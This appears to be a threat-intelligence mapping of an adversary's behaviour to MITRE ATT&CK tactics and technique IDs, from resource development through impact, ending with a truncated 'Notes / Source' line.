Develop Capabilities: Digital Certificates [T1587.003]  Develop Capabilities: Malware [T1587.001]
Obtain Capabilities: Code Signing Certificates [T1588.003] Establish Accounts: Cloud Accounts [T1585.003]
Compromise Infrastructure: Network Devices [T1584.008] Obtain Capabilities: Digital Certificates [T1588.004]
Initial Access (TA0001)
Valid Accounts [T1078]  Phishing [T1566]
Valid Accounts: Default Accounts [T1078.001]   Phishing: Spearphishing Attachment [T1566.001]  
Valid Accounts: Domain Accounts [T1078.002]   Phishing: Spearphishing Link [T1566.002]
External Remote Services [T1133] Exploit Public-Facing Application [T1190]
Drive-by Compromise [T1189]   
Execution (TA0002)
Windows Management Instrumentation [T1047]   Command and Scripting Interpreter: Python [T1059.006] 
Scheduled Task/Job: At [T1053.002]  Command and Scripting Interpreter: JavaScript [T1059.007] 
Scheduled Task/Job: Scheduled Task [T1053.005]   Native API [T1106] 
Command and Scripting Interpreter [T1059]   Inter-Process Communication [T1559] 
Command and Scripting Interpreter: Windows Command Shell [T1059.003]  System Services: Service Execution [T1569.002]  
Command and Scripting Interpreter: PowerShell [T1059.001]  Exploitation for Client Execution [T1203]  
Command and Scripting Interpreter: Visual Basic [T1059.005]  User Execution: Malicious File [T1204.002]  
Command and Scripting Interpreter: Unix Shell [T1059.004] Command and Scripting Interpreter: Apple Script [T1059.002]
Scheduled Task/Job: Cron [T1053.003] Software Deployment Tools [T1072]
Persistence (TA0003)
Valid Accounts [T1078]  Server Software Component: Web Shell [T1505.003] 
Office Application Startup: Office Template Macros [T1137.001] Create or Modify System Process: Windows Service [T1543.003] 
Scheduled Task/Job: At [T1053.002]  Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001] 
Scheduled Task/Job: Scheduled Task [T1053.005]   Boot or Logon Autostart Execution: Shortcut Modification [T1547.009] 
External Remote Services [T1133]  Hijack Execution Flow: DLL Search Order Hijacking [T1574.001] 
Scheduled Task/Job: Cron [T1053.003]   Hijack Execution Flow: DLL Side-Loading [T1574.002] 
Account Manipulation [T1098] Valid Accounts: Cloud Accounts [T1078.004]
Valid Accounts: Domain Accounts [T1078.002]  
Privilege Escalation (TA0004)
Scheduled Task/Job: At [T1053.002]  Create or Modify System Process: Windows Service [T1543.003] 
Scheduled Task/Job: Scheduled Task [T1053.005]   Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001] 
Process Injection: Thread Execution Hijacking [T1055.003]  Boot or Logon Autostart Execution: Shortcut Modification [T1547.009] 
Process Injection: Process Hollowing [T1055.012] Hijack Execution Flow: DLL Search Order Hijacking [T1574.001]
Valid Accounts: Domain Accounts [T1078.002] Exploitation for Privilege Escalation [T1068]
Access Token Manipulation: Token Impersonation/Theft [T1134.001] Event Triggered Execution: Unix Shell Configuration Modification [T1546.004]
Process Injection: Dynamic-link Library Injection [T1055.001] Valid Accounts: Domain Accounts [T1078.002]
Valid Accounts: Local Accounts [T1078.003]  
Defense Evasion (TA0005)
Rootkit [T1014]  Indirect Command Execution [T1202] 
Obfuscated Files or Information [T1027]   System Binary Proxy Execution: Mshta [T1218.005] 
Obfuscated Files or Information: Software Packing [T1027.002]  System Binary Proxy Execution: Regsvr32 [T1218.010] 
Obfuscated Files or Information: Steganography [T1027.003]  Subvert Trust Controls: Code Signing [T1553.002] 
Obfuscated Files or Information: Compile After Delivery [T1027.004]  File and Directory Permissions Modifications: Linux and Mac File and Directory Permissions Modification [T1222.002]  
Masquerading: Match Legitimate Name or Location [T1036.005]  Virtualisation/Sandbox Evasion: System Checks [T1497.001] 
Process Injection: Thread Execution Hijacking [T1055.003] Masquerading [T1036]
Reflective Code Loading [T1620] Impair Defences: Disable or Modify System Firewall [T1562.004] 
Process Injection: Process Hollowing [T1055.012]  Hide Artifacts: Hidden Files and Directories [T1564.001] 
Indicator Removal: File Deletion [T1070.004]   Hide Artifacts: Hidden Window [T1564.003]  
Indicator Removal: Timestomp [T1070.006]   Hijack Execution Flow: DLL Search Order Hijacking [T1574.001] 
Indicator Removal: Clear Windows Event Logs [T1070.001] Hijack Execution Flow: DLL Side-Loading [T1574.002] 
Modify Registry [T1112]  Web Service [T1102] 
Deobfuscate/Decode Files or Information [T1140]  Masquerading: Masquerade Task or Service [T1036.004]
Impair Defenses [T1562]  
Credential Access (TA0006)
OS Credential Dumping: LSASS Memory [T1003.001]   Unsecured Credentials: Credentials in Files [T1552.001]
OS Credential Dumping: NTDS [T1003.003]   Brute Force: Password Guessing [T1110.001]
Network Sniffing [T1040]  Forced Authentication [T1187]
Credentials from Password Stores: Keychain [T1555.001] Steal or Forge Kerberos Tickets: Kerberoasting [T1558.003] 
Input Capture: Keylogging [T1056.001]  Multi-Factor Authentication Interception [T1111]
Steal Web Session Cookie [T1539]  Steal Application Access Token [T1528]
Exploitation for Credential Access [T1212] Brute Force: Password Cracking [T1110.002]
Input Capture: Web Portal Capture [T1056.003] OS Credential Dumping: DCSync [T1003.006]
Credentials from Password Stores [T1555]  Credentials from Password Stores: Credentials from Web Browsers [T1555.003]
Discovery (TA0007)
System Service Discovery [T1007]  System Information Discovery [T1082]  
Application Window Discovery [T1010]   Account Discovery: Local Account [T1087.001]  
Query Registry [T1012]  System Information Discovery, Technique T1082 – Enterprise | MITRE ATT&CK®
File and Directory Discovery [T1083] System Time Discovery [T1124] 
Network Service Discovery [T1046]  System Owner/User Discovery [T1033] 
Remote System Discovery [T1018]  Domain Trust Discovery [T1482] 
Account Discovery: Email Account [T1087.003] Account Discovery: Domain Account [T1087.002]
System Network Connections Discovery [T1049]  Virtualisation/Sandbox Evasion: System Checks [T1497.001] 
Process Discovery [T1057]  Software Discovery [T1518] 
Permission Groups Discovery: Domain Groups [T1069.002]  Network Share Discovery, Technique T1135 – Enterprise | MITRE ATT&CK®
System Network Configuration Discovery: Internet Connection Discovery [T1016.001]  
Lateral Movement (TA0008)
Remote Services: Remote Desktop Protocol [T1021.001]  Remote Services [T1021]
Remote Services: SMB/Windows Admin Shares [T1021.002]  Use Alternate Authentication Material: Pass the Ticket [T1550.003]
Remote Services: Windows Remote Management [T1021.006]  Lateral Tool Transfer [T1570] 
Collection (TA0009)
Data from Local System [T1005]  Archive Collected Data: Archive via Library [T1560.002]
Data from Network Shared Drive [T1039]   Email Collection: Remote Email Collection [T1114.002] 
Input Capture: Keylogging [T1056.001]  Clipboard Data [T1115] 
Automated Collection [T1119] Data from Information Repositories [T1213]
Input Capture: Web Portal Capture [T1056.003] Data Staged: Remote Data Staging [T1074.002] 
Data Staged: Local Data Staging [T1074.001]  Archive Collected Data [T1560]
Email Collection [T1114]  
Exfiltration (TA0010)
Exfiltration Over C2 Channel [T1041]   Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [T1048.002]
Exfiltration Over Alternative Protocol [T1048]  Exfiltration Over Web Service: Exfiltration to Cloud Storage [T1567.002]
Command and Control (TA0011)
Data Obfuscation: Protocol Impersonation [T1001.003]  Web Service: Dead Drop Resolver [T1102.001]  
Commonly Used Port [T1043]  Web Service: One-way Communication [T1102.003]
Application Layer Protocol: Web Protocols [T1071.001]  Ingress Tool Transfer [T1105] 
Application Layer Protocol: File Transfer Protocols [T1071.002] Proxy: Internal Proxy [T1090.001]
Proxy: External Proxy [T1090.002]  Non-Standard Port [T1571] 
Proxy: Multi-hop Proxy [T1090.003]  Protocol Tunnelling [T1572] 
Web Service: Bidirectional Communication [T1102.002]  Encrypted Channel [T1573] 
Encrypted Channel: Asymmetric Cryptography [T1573.002] Ingress Tool Transfer [T1105]
Proxy, Technique T1090 – Enterprise | MITRE ATT&CK®  
Impact (TA0040)
Service Stop [T1489]  Disk Wipe [T1561]
System Shutdown/Reboot [T1529]  Resource Hijacking [T1496] 

Notes

Source…